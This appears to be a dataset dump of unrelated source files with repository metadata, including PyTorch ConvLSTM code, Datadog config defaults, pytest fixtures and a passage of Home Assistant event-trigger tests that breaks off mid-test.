] | 10 | 2019-03-19T21:16:56.000Z | 2019-04-16T15:05:37.000Z | QuantTorch/DorefaNet.py | Enderdead/BinaryConnect_PyTorch | 990e970b1fbd299ff88200db21a9cc3fe44706d3 | [
"MIT"
] | 9 | 2019-08-12T10:33:55.000Z | 2021-07-23T02:10:06.000Z | from QuantTorch.functions.dorefa_connect import *
from QuantTorch.layers.dorefa_layers import * | 47.5 | 49 | 0.863158 | 12 | 95 | 6.666667 | 0.583333 | 0.35 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073684 | 95 | 2 | 50 | 47.5 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7664aaba072ca257952878cf91d39bb85d019333 | 46 | py | Python | MousePosition.py | PratyushRanjanTiwari/Automatic-Form-Filler | 4347dcd9a9d7ef3cf71a28587c7871300ac431cd | [
"MIT"
] | 2 | 2017-05-06T16:35:42.000Z | 2018-05-18T11:04:46.000Z | MousePosition.py | PratyushRanjanTiwari/Automatic-Form-Filler | 4347dcd9a9d7ef3cf71a28587c7871300ac431cd | [
"MIT"
] | null | null | null | MousePosition.py | PratyushRanjanTiwari/Automatic-Form-Filler | 4347dcd9a9d7ef3cf71a28587c7871300ac431cd | [
"MIT"
] | null | null | null | import pyautogui
print pyautogui.position()
| 15.333333 | 27 | 0.804348 | 5 | 46 | 7.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 46 | 2 | 28 | 23 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
768dc8920b91817efc4bf4a9bcbb3c85a1e54171 | 151 | py | Python | python/datamongo/text/dmo/__init__.py | jiportilla/ontology | 8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40 | [
"MIT"
] | null | null | null | python/datamongo/text/dmo/__init__.py | jiportilla/ontology | 8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40 | [
"MIT"
] | null | null | null | python/datamongo/text/dmo/__init__.py | jiportilla/ontology | 8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40 | [
"MIT"
] | null | null | null | from .text_query_filter import TextQueryFilter
from .text_query_generator import TextQueryGenerator
from .text_query_windower import TextQueryWindower
| 37.75 | 52 | 0.900662 | 18 | 151 | 7.222222 | 0.555556 | 0.184615 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07947 | 151 | 3 | 53 | 50.333333 | 0.935252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
76c2c9b293269833686e2bb6e6e8c4aaa224f47f | 42 | py | Python | python/graphiler/utils/__init__.py | xiezhq-hermann/graphiler | 4d3dd2d2e0a095e3e834be3a34f402bf43e4b4fa | [
"Apache-2.0"
] | 17 | 2022-02-09T16:43:15.000Z | 2022-03-30T07:05:40.000Z | python/graphiler/utils/__init__.py | xiezhq-hermann/graphiler | 4d3dd2d2e0a095e3e834be3a34f402bf43e4b4fa | [
"Apache-2.0"
] | 1 | 2022-02-12T08:24:21.000Z | 2022-02-12T08:24:21.000Z | python/graphiler/utils/__init__.py | xiezhq-hermann/graphiler | 4d3dd2d2e0a095e3e834be3a34f402bf43e4b4fa | [
"Apache-2.0"
] | 2 | 2022-02-09T23:51:42.000Z | 2022-03-10T16:21:27.000Z | from .setup import *
from .bench import *
| 14 | 20 | 0.714286 | 6 | 42 | 5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 42 | 2 | 21 | 21 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4f3b63470bbcc2944b797569bd44662cc7ac9e3c | 62 | py | Python | multilingual_t5/r_ic_all_ta/__init__.py | sumanthd17/mt5 | c99b4e3ad1c69908c852c730a1323ccb52d48f58 | [
"Apache-2.0"
] | null | null | null | multilingual_t5/r_ic_all_ta/__init__.py | sumanthd17/mt5 | c99b4e3ad1c69908c852c730a1323ccb52d48f58 | [
"Apache-2.0"
] | null | null | null | multilingual_t5/r_ic_all_ta/__init__.py | sumanthd17/mt5 | c99b4e3ad1c69908c852c730a1323ccb52d48f58 | [
"Apache-2.0"
] | null | null | null | """r_ic_all_ta dataset."""
from .r_ic_all_ta import RIcAllTa
| 15.5 | 33 | 0.758065 | 12 | 62 | 3.416667 | 0.666667 | 0.146341 | 0.292683 | 0.390244 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112903 | 62 | 3 | 34 | 20.666667 | 0.745455 | 0.322581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
4f954beeec51facce69cd04b6acd2750c11f2029 | 579 | py | Python | tests/conftest.py | Enselic/git-repo-language-trend | b701138a85f7c7b4e3cde5f6cd29b6d006b493cf | [
"MIT"
] | 1 | 2021-07-27T12:08:52.000Z | 2021-07-27T12:08:52.000Z | tests/conftest.py | Enselic/git-repo-language-trend | b701138a85f7c7b4e3cde5f6cd29b6d006b493cf | [
"MIT"
] | 5 | 2021-01-24T10:18:26.000Z | 2021-07-02T09:48:00.000Z | tests/conftest.py | Enselic/git-repo-language-trends | b701138a85f7c7b4e3cde5f6cd29b6d006b493cf | [
"MIT"
] | null | null | null | from random import randint
import pytest
@pytest.fixture
def random_output_basename(tmp_path):
return str(tmp_path / f"output-{randint(1,100000)}")
@pytest.fixture
def tsv_output_path(random_output_basename):
return f"{random_output_basename}.tsv"
@pytest.fixture
def csv_output_path(random_output_basename):
return f"{random_output_basename}.csv"
@pytest.fixture
def svg_output_path(random_output_basename):
return f"{random_output_basename}.svg"
@pytest.fixture
def png_output_path(random_output_basename):
return f"{random_output_basename}.png"
| 19.965517 | 56 | 0.792746 | 83 | 579 | 5.192771 | 0.240964 | 0.25058 | 0.417633 | 0.204176 | 0.529002 | 0.529002 | 0.529002 | 0.529002 | 0.529002 | 0.529002 | 0 | 0.013592 | 0.110535 | 579 | 28 | 57 | 20.678571 | 0.823301 | 0 | 0 | 0.294118 | 0 | 0 | 0.238342 | 0.238342 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0 | 0.117647 | 0.294118 | 0.705882 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
4fffea1408e201dad439a35be9406858e0d67c01 | 46 | py | Python | fastmsa/logging.py | abhan00/fastana | 46f90832d8e24185619292f76cbd1b3ce73f2dae | [
"Apache-2.0"
] | 1 | 2021-05-01T13:44:44.000Z | 2021-05-01T13:44:44.000Z | fastmsa/logging.py | abhan00/fastana | 46f90832d8e24185619292f76cbd1b3ce73f2dae | [
"Apache-2.0"
] | 9 | 2021-04-17T03:22:56.000Z | 2021-05-12T16:40:53.000Z | fastmsa/logging.py | abhan00/fastana | 46f90832d8e24185619292f76cbd1b3ce73f2dae | [
"Apache-2.0"
] | null | null | null | from .core._logging import get_logger # noqa
| 23 | 45 | 0.782609 | 7 | 46 | 4.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 46 | 1 | 46 | 46 | 0.871795 | 0.086957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8b0b681a807652f33b42f6ca5c781e602255191d | 72 | py | Python | src/huggingmolecules/models/__init__.py | chrislybaer/huggingmolecules | 210239ac46b467e900a47e8f4520054636744ca6 | [
"Apache-2.0"
] | 60 | 2021-05-07T16:07:26.000Z | 2022-03-26T19:23:54.000Z | src/huggingmolecules/models/__init__.py | gabegomes/huggingmolecules | adc581c97fbc21d9967dd9334afa94b22fb77651 | [
"Apache-2.0"
] | 11 | 2021-05-07T16:01:35.000Z | 2022-03-09T13:06:05.000Z | src/huggingmolecules/models/__init__.py | gabegomes/huggingmolecules | adc581c97fbc21d9967dd9334afa94b22fb77651 | [
"Apache-2.0"
] | 12 | 2021-05-20T08:02:25.000Z | 2022-03-10T14:11:36.000Z | from .models_grover import GroverModel
from .models_mat import MatModel
| 24 | 38 | 0.861111 | 10 | 72 | 6 | 0.7 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 72 | 2 | 39 | 36 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8b0c0923f230a5329da990775c88734ee944169b | 1,143 | py | Python | dns_check/datadog_checks/dns_check/config_models/defaults.py | tdimnet/integrations-core | a78133a3b71a1b8377fa214d121a98647031ab06 | [
"BSD-3-Clause"
] | 1 | 2021-12-15T22:45:14.000Z | 2021-12-15T22:45:14.000Z | dns_check/datadog_checks/dns_check/config_models/defaults.py | tdimnet/integrations-core | a78133a3b71a1b8377fa214d121a98647031ab06 | [
"BSD-3-Clause"
] | null | null | null | dns_check/datadog_checks/dns_check/config_models/defaults.py | tdimnet/integrations-core | a78133a3b71a1b8377fa214d121a98647031ab06 | [
"BSD-3-Clause"
] | null | null | null | # (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from datadog_checks.base.utils.models.fields import get_default_field_value
def shared_default_timeout(field, value):
return 5
def shared_service(field, value):
return get_default_field_value(field, value)
def instance_disable_generic_tags(field, value):
return False
def instance_empty_default_hostname(field, value):
return False
def instance_min_collection_interval(field, value):
return 15
def instance_name(field, value):
return get_default_field_value(field, value)
def instance_nameserver(field, value):
return get_default_field_value(field, value)
def instance_nameserver_port(field, value):
return 53
def instance_record_type(field, value):
return 'A'
def instance_resolves_as(field, value):
return get_default_field_value(field, value)
def instance_service(field, value):
return get_default_field_value(field, value)
def instance_tags(field, value):
return get_default_field_value(field, value)
def instance_timeout(field, value):
return 5
| 20.052632 | 75 | 0.773403 | 161 | 1,143 | 5.21118 | 0.329193 | 0.309893 | 0.247914 | 0.166865 | 0.581645 | 0.524434 | 0.448153 | 0.448153 | 0.448153 | 0.448153 | 0 | 0.011329 | 0.150481 | 1,143 | 56 | 76 | 20.410714 | 0.852729 | 0.094488 | 0 | 0.37037 | 0 | 0 | 0.00097 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.481481 | false | 0 | 0.037037 | 0.481481 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
8b1d4064a5e19e9b59d8953a84cdda0366402380 | 25 | py | Python | modules/dirsearch/lib/core/controller/__init__.py | Farz7/Darkness | 4f3eb5fee3d8a476d001ad319ca22bca274eeac9 | [
"MIT"
] | 655 | 2017-09-11T19:35:20.000Z | 2022-03-31T08:01:10.000Z | Module/dirsearch/lib/controller/__init__.py | bemonolit/Yuki-Chan-The-Auto-Pentest | bea1af4e1d544eadc166f728be2f543ea10af191 | [
"MIT"
] | 10 | 2017-09-29T18:45:39.000Z | 2022-03-30T15:34:29.000Z | Module/dirsearch/lib/controller/__init__.py | bemonolit/Yuki-Chan-The-Auto-Pentest | bea1af4e1d544eadc166f728be2f543ea10af191 | [
"MIT"
] | 262 | 2017-09-16T22:15:50.000Z | 2022-03-31T00:38:42.000Z | from .Controller import * | 25 | 25 | 0.8 | 3 | 25 | 6.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12 | 25 | 1 | 25 | 25 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8b4aa1ec412e1720eb36920fc5d5c00b07f7f147 | 10,196 | py | Python | convolution_lstm.py | braraki/Convolution_LSTM_PyTorch | e30502568f28380f1a5eb355d38590f403478a10 | [
"MIT"
] | null | null | null | convolution_lstm.py | braraki/Convolution_LSTM_PyTorch | e30502568f28380f1a5eb355d38590f403478a10 | [
"MIT"
] | null | null | null | convolution_lstm.py | braraki/Convolution_LSTM_PyTorch | e30502568f28380f1a5eb355d38590f403478a10 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from torch.autograd import Variable
import pdb
''' NOTES
- steps are how many times you recurse over the data! (eg the length of the trajectory)
- effective_steps is a list of which step outputs you want to save
- the format of the data as-is is [batch size, input channels, h, w, d]
- you need to change it to accept [batch size, trajectory, input channels, h, w, d]
and then have 'step' index the trajectory
'''
class ConvLSTMCell(nn.Module):
def __init__(self, input_channels, hidden_channels, kernel_size):
super(ConvLSTMCell, self).__init__()
assert hidden_channels % 2 == 0
self.input_channels = input_channels
self.hidden_channels = hidden_channels
self.kernel_size = kernel_size
self.num_features = 4
self.padding = int((kernel_size - 1) / 2)
self.Wxi = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Whi = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxf = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Whf = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxc = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Whc = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxo = nn.Conv2d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Who = nn.Conv2d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wci = None
self.Wcf = None
self.Wco = None
def forward(self, x, h, c):
ci = torch.sigmoid(self.Wxi(x) + self.Whi(h) + c * self.Wci)
cf = torch.sigmoid(self.Wxf(x) + self.Whf(h) + c * self.Wcf)
cc = cf * c + ci * torch.tanh(self.Wxc(x) + self.Whc(h))
co = torch.sigmoid(self.Wxo(x) + self.Who(h) + cc * self.Wco)
ch = co * torch.tanh(cc)
return ch, cc
def init_hidden(self, batch_size, hidden, shape):
if self.Wci is None:
self.Wci = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()
self.Wcf = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()
self.Wco = Variable(torch.zeros(1, hidden, shape[0], shape[1])).cuda()
else:
assert shape[0] == self.Wci.size()[2], 'Input Height Mismatched!'
assert shape[1] == self.Wci.size()[3], 'Input Width Mismatched!'
return (Variable(torch.zeros(batch_size, hidden, shape[0], shape[1])).cuda(),
Variable(torch.zeros(batch_size, hidden, shape[0], shape[1])).cuda())
class ConvLSTM(nn.Module):
# input_channels corresponds to the first input feature map
# hidden state is a list of succeeding lstm layers.
def __init__(self, input_channels, hidden_channels, kernel_size, step=1, effective_step=[0]):
super(ConvLSTM, self).__init__()
self.input_channels = [input_channels] + hidden_channels
self.hidden_channels = hidden_channels
self.kernel_size = kernel_size
self.num_layers = len(hidden_channels)
self.step = step
self.effective_step = effective_step
self._all_layers = []
for i in range(self.num_layers):
name = 'cell{}'.format(i)
cell = ConvLSTMCell(self.input_channels[i], self.hidden_channels[i], self.kernel_size)
setattr(self, name, cell)
self._all_layers.append(cell)
def forward(self, input):
internal_state = []
outputs = []
for step in range(self.step):
x = input
for i in range(self.num_layers):
# all cells are initialized in the first step
name = 'cell{}'.format(i)
if step == 0:
bsize, _, height, width = x.size()
(h, c) = getattr(self, name).init_hidden(batch_size=bsize, hidden=self.hidden_channels[i],
shape=(height, width))
internal_state.append((h, c))
# do forward
(h, c) = internal_state[i]
x, new_c = getattr(self, name)(x, h, c)
internal_state[i] = (x, new_c)
# only record effective steps
if step in self.effective_step:
outputs.append(x)
return outputs, (x, new_c)
class ConvLSTMCell3d(nn.Module):
def __init__(self, input_channels, hidden_channels, kernel_size):
super(ConvLSTMCell3d, self).__init__()
assert hidden_channels % 2 == 0
self.input_channels = input_channels
self.hidden_channels = hidden_channels
self.kernel_size = kernel_size
self.num_features = 4
self.padding = 0 # int((kernel_size - 1) / 2)
self.Wxi = nn.Conv3d(in_channels=self.input_channels,
out_channels=self.hidden_channels,
kernel_size=self.kernel_size,
stride=1, padding=self.padding,
bias=True)
self.Whi = nn.Conv3d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxf = nn.Conv3d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Whf = nn.Conv3d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxc = nn.Conv3d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Whc = nn.Conv3d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wxo = nn.Conv3d(self.input_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=True)
self.Who = nn.Conv3d(self.hidden_channels, self.hidden_channels, self.kernel_size, 1, self.padding, bias=False)
self.Wci = None
self.Wcf = None
self.Wco = None
def forward(self, x, h, c):
ci = torch.sigmoid(self.Wxi(x) + self.Whi(h) + c * self.Wci)
cf = torch.sigmoid(self.Wxf(x) + self.Whf(h) + c * self.Wcf)
cc = cf * c + ci * torch.tanh(self.Wxc(x) + self.Whc(h))
co = torch.sigmoid(self.Wxo(x) + self.Who(h) + cc * self.Wco)
ch = co * torch.tanh(cc)
return ch, cc
def init_hidden(self, batch_size, hidden, shape):
if self.Wci is None:
self.Wci = Variable(torch.zeros(1, hidden, shape[0], shape[1], shape[2])).cuda()
self.Wcf = Variable(torch.zeros(1, hidden, shape[0], shape[1], shape[2])).cuda()
self.Wco = Variable(torch.zeros(1, hidden, shape[0], shape[1], shape[2])).cuda()
else:
assert shape[0] == self.Wci.size()[2], 'Input Height Mismatched!'
assert shape[1] == self.Wci.size()[3], 'Input Width Mismatched!'
assert shape[2] == self.Wci.size()[4], 'Input Depth Mismatched!'
return (Variable(torch.zeros(batch_size, hidden, shape[0], shape[1], shape[2])).cuda(),
Variable(torch.zeros(batch_size, hidden, shape[0], shape[1], shape[2])).cuda())
# CHANGES from the original code:
# step now indexes the trajectory
# got rid of effective_step because I need to save every step
# the 3D conv needs only 1 input channel so I got rid of the
# requirement you need an even # of input channels (what's up with that anyway?)
class ConvLSTM3d(nn.Module):
# input_channels corresponds to the first input feature map
# hidden state is a list of succeeding lstm layers.
def __init__(self, input_channels, hidden_channels, kernel_size, step=1, effective_step=[0]):
super(ConvLSTM3d, self).__init__()
self.input_channels = [input_channels] + hidden_channels
self.hidden_channels = hidden_channels
self.kernel_size = kernel_size
self.num_layers = len(hidden_channels)
self.step = step
self.effective_step = effective_step
self._all_layers = []
for i in range(self.num_layers):
name = 'cell{}'.format(i)
cell = ConvLSTMCell3d(self.input_channels[i], self.hidden_channels[i], self.kernel_size)
setattr(self, name, cell)
self._all_layers.append(cell)
def forward(self, input):
internal_state = []
outputs = []
for step in range(self.step):
x = input
for i in range(self.num_layers):
# all cells are initialized in the first step
name = 'cell{}'.format(i)
if step == 0:
bsize, _, height, width, depth = x.size()
(h, c) = getattr(self, name).init_hidden(batch_size=bsize,
hidden=self.hidden_channels[i],
shape=(height, width, depth))
internal_state.append((h, c))
# do forward
(h, c) = internal_state[i]
x, new_c = getattr(self, name)(x, h, c)
internal_state[i] = (x, new_c)
# only record effective steps
if step in self.effective_step:
outputs.append(x)
return outputs, (x, new_c)
if __name__ == '__main__':
# gradient check
convlstm = ConvLSTM(input_channels=512, hidden_channels=[128, 64, 64, 32, 32], kernel_size=3, step=5,
effective_step=[4]).cuda()
loss_fn = torch.nn.MSELoss()
input = Variable(torch.randn(1, 512, 64, 32)).cuda()
target = Variable(torch.randn(1, 32, 64, 32)).double().cuda()
output = convlstm(input)
output2 = output[0][0].double()
res = torch.autograd.gradcheck(loss_fn, (output2, target), eps=1e-6, raise_exception=True)
print(res)
pdb.set_trace()
print('hi') | 47.423256 | 119 | 0.610043 | 1,377 | 10,196 | 4.366739 | 0.135802 | 0.10943 | 0.095792 | 0.084151 | 0.811908 | 0.806586 | 0.806586 | 0.801763 | 0.794113 | 0.794113 | 0 | 0.018135 | 0.26991 | 10,196 | 215 | 120 | 47.423256 | 0.789629 | 0.067085 | 0 | 0.592593 | 0 | 0 | 0.016548 | 0 | 0 | 0 | 0 | 0 | 0.04321 | 1 | 0.061728 | false | 0 | 0.024691 | 0 | 0.148148 | 0.012346 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8c9b9b3bfe9a283884709dc4112979036d85f802 | 46 | py | Python | Part_1_beginner/04_print_function/special_separator_3.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | Part_1_beginner/04_print_function/special_separator_3.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | Part_1_beginner/04_print_function/special_separator_3.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | 1 | 2021-02-20T08:30:56.000Z | 2021-02-20T08:30:56.000Z |
print("Mój ulubiony sport to \\triathlon\ ")
| 15.333333 | 44 | 0.695652 | 6 | 46 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 46 | 2 | 45 | 23 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
8ca7caaa0a55affaa1c1a80379fc6d3e4bbd965a | 12,158 | py | Python | tests/components/homeassistant/triggers/test_event.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | tests/components/homeassistant/triggers/test_event.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 31,101 | 2020-03-02T13:00:16.000Z | 2022-03-31T23:57:36.000Z | tests/components/homeassistant/triggers/test_event.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """The tests for the Event automation."""
import pytest
import homeassistant.components.automation as automation
from homeassistant.const import ATTR_ENTITY_ID, ENTITY_MATCH_ALL, SERVICE_TURN_OFF
from homeassistant.core import Context
from homeassistant.setup import async_setup_component
from tests.common import async_mock_service, mock_component
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
@pytest.fixture
def context_with_user():
"""Create a context with default user_id."""
return Context(user_id="test_user_id")
@pytest.fixture(autouse=True)
def setup_comp(hass):
"""Initialize components."""
mock_component(hass, "group")
async def test_if_fires_on_event(hass, calls):
"""Test the firing of events."""
context = Context()
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"action": {
"service": "test.automation",
"data_template": {"id": "{{ trigger.id}}"},
},
}
},
)
hass.bus.async_fire("test_event", context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context.id
await hass.services.async_call(
automation.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: ENTITY_MATCH_ALL},
blocking=True,
)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["id"] == 0
async def test_if_fires_on_templated_event(hass, calls):
"""Test the firing of events."""
context = Context()
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger_variables": {"event_type": "test_event"},
"trigger": {"platform": "event", "event_type": "{{event_type}}"},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context.id
await hass.services.async_call(
automation.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: ENTITY_MATCH_ALL},
blocking=True,
)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_multiple_events(hass, calls):
"""Test the firing of events."""
context = Context()
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "event",
"event_type": ["test_event", "test2_event"],
},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire("test_event", context=context)
await hass.async_block_till_done()
hass.bus.async_fire("test2_event", context=context)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[0].context.parent_id == context.id
assert calls[1].context.parent_id == context.id
async def test_if_fires_on_event_extra_data(hass, calls, context_with_user):
"""Test the firing of events still matches with event data and context."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"action": {"service": "test.automation"},
}
},
)
hass.bus.async_fire(
"test_event", {"extra_key": "extra_data"}, context=context_with_user
)
await hass.async_block_till_done()
assert len(calls) == 1
await hass.services.async_call(
automation.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: ENTITY_MATCH_ALL},
blocking=True,
)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_event_with_data_and_context(hass, calls, context_with_user):
"""Test the firing of events with data and context."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
